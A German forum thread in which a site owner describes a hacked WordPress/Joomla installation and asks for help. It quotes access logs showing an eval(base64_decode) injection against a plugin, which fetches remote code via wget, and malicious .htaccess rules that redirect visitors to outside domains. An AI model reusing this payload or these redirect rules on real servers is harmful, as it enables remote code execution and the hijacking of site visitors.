Beiträge von Bluray

    Hallo ralf.

    Die Website musste ich natürlich löschen. Bei 400 Umleitungen auf Seiten, die meinen Besuchern einen Trojaner zu setzen versuchen. Und mein zweites Blog kam beim Anwählen mit der Meldung, wo man eine Datei namens "x-gzip" speichern wollte. (Da wär ich schnell meine paar Leser los.)
    Da bin ich mit 12-Stunden-Tagen -- auch ohne Spammer -- überfordert.
    Ich habe den Mist auf der Festplatte. Aber da ist natürlich die Zeit nicht mehr festzustellen. (Das wenn ich vorher gewust hätte. Wirklich logisch...)

    Ich habe aber einige Kameraden, wie du sie beschreibst (meine Seite habe ich mal mit xxx überschrieben):


    193.105.210.172 - - [31/May/2011:10:03:26 +0200] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgLU8gaXNfaHVtYW5fY2xhc3MucGhwIGh0dHA6Ly8xNzA1MjAxMS5jei5jYy9hc2QudHh0Jyk7));error HTTP/1.0" 404 1424 "http://www.xxx.com/wp-content/plu…_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgLU8gaXNfaHVtYW5fY2xhc3MucGhwIGh0dHA6Ly8xNzA1MjAxMS5jei5jYy9hc2QudHh0Jyk7));error" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
    193.105.210.172 - - [31/May/2011:10:03:27 +0200] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgLU8gaXNfaHVtYW5fY2xhc3MucGhwIGh0dHA6Ly8xNzA1MjAxMS5jei5jYy9hc2QudHh0Jyk7));error HTTP/1.1" 404 1424 "-" "xpymep.exe"
    193.105.210.172 - - [31/May/2011:10:03:27 +0200] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgLU8gaXNfaHVtYW5fY2xhc3MucGhwIGh0dHA6Ly8xNzA1MjAxMS5jei5jYy9hc2QudHh0Jyk7));error HTTP/1.0" 404 1424 "http://xxx.com/wp-content/plu…_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgLU8gaXNfaHVtYW5fY2xhc3MucGhwIGh0dHA6Ly8xNzA1MjAxMS5jei5jYy9hc2QudHh0Jyk7));error" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
    193.105.210.172 - - [31/May/2011:10:03:27 +0200] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgLU8gaXNfaHVtYW5fY2xhc3MucGhwIGh0dHA6Ly8xNzA1MjAxMS5jei5jYy9hc2QudHh0Jyk7));errorindex.php HTTP/1.0" 404 1424 "http://www.xxx.com/wp-content/plu…_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgLU8gaXNfaHVtYW5fY2xhc3MucGhwIGh0dHA6Ly8xNzA1MjAxMS5jei5jYy9hc2QudHh0Jyk7));errorindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"


    Aber was ich daraus schließen sollte/könnte...

    Merkwürdig ist, dass die in wp-content zugange waren; und die Wordpress-Sachen werden bei mir ja ständig upgedatet, da ich fast jeden Tag in den Blogs bin. Ich hätte eher auf Joomla getippt, wo ich schon länger nicht mehr Ordnung geschaffen habe.

    Ich muss mich hinhauen...
    Tschüs
    Blueray

    Hallo Marcus,

    danke für die Meldung. Dacht ich auch zuerst dran, aber weder Kaspersky, noch Spybot - Search & Destroy u.ä. können was finden. Laufen auch ständig bei mir.

    Ich habe was anderes festgestellt: Meine Blogs sind Unterverzeichnisse in einer Jooomla-Installation & diese war mit über 300 .htaccess-Dateien vermüllt; Wordpress hat's also nur nebenbei erwischt.

    Ich habe Joomla auf den Stand der Dinge gebracht, alle fremden .htaccess-Dateien mühselig vernichtet. (Der größte Teil in einem Piwik-Verzeichnis, das ich einfach gelöscht habe.)
    Dann noch ein Dutzend Passwörter geändert.
    Auf gut Deutsch den ganzen lieben langen Tag vertan.

    Ich tippe auf eine Sicherheits-Lücke, die irgendwie mit Joomla zu tun hat – oder "hatte", wie ich hoffe. Mehr fällt mir heute nicht mehr ein. Mal sehen, was sich die nächsten Tage tut. Den "18 Uhr-Robotertermin" der letzten beiden Tage habe ich zumindest bereits überstanden.

    Und wieder mal den festen Entschluss gefasst, mich wenigstens einmal im Monat um die Website als solche zu kümmern... Aber erst mach ich ein Voodoo-Püppchen mit vielen Nadeln drin...

    Danke nochmal für die Tipps.
    Schön' Abend!
    Bluray

    Hallo ralf!

    Danke für die Punkte. Werd ich wohl abackern müssen.
    Anscheinend funktionieren meine eigenen .htaccess-Dateien denn doch nicht so, wie sie sollten.

    Dienstleister kann ich mir nicht leisten. Leider. Hab mir aber deine Website notiert. (Sieht gut aus.) Falls ich nicht klar kommen sollte...

    Mich würde aber trotzdem noch interessieren, was genau diese Dateien machen sollen. Und warum sie -- wenn Sie machen, was sie machen sollen -- mich selbst bzw. meine Bilder aussperren. Andernfalls hätte ich doch das ewig nicht bemerkt.

    Danke erst mal!
    Bluray

    Hallo!

    Vorgestern waren auf meinen Blogs die Bilder verschwunden.
    Als ich auf dem Server nachguckte, sah ich, dass jemand alle Verzeichnisse unter .../wp-content/uploads mit .htaccess-Dateien verkleistert hatte.
    Ich habe sie mühsam einzeln gelöscht. Die Bilder waren daraufhin wieder da.

    Nur habe ich bisher keine Lösung gefunden, wie ich das künftig verhindern kann.
    (Von all-inklusive habe ich leider noch keine nützliche Antwort.)

    Also waren die Verzeichnisse heute prompt wieder zugekleistert.

    Folgende Inhalte

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^http://
    RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
    RewriteRule . http://cheap-eom-software.com/%25%7BREMOTE_ADDR}

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^http://
    RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
    RewriteRule . http://fundamericanow.com/r/404.php?%25%7BREMOTE_ADDR}

    Ich denke mal, das geht jetzt jeden Tag so weiter.

    Meine Fragen:

    1) Was bezwecken diese Dateien?
    2) Wie wehre ich mich gegen so etwas?

    Kann jemand helfen?
    Besten Dank!
    Bluray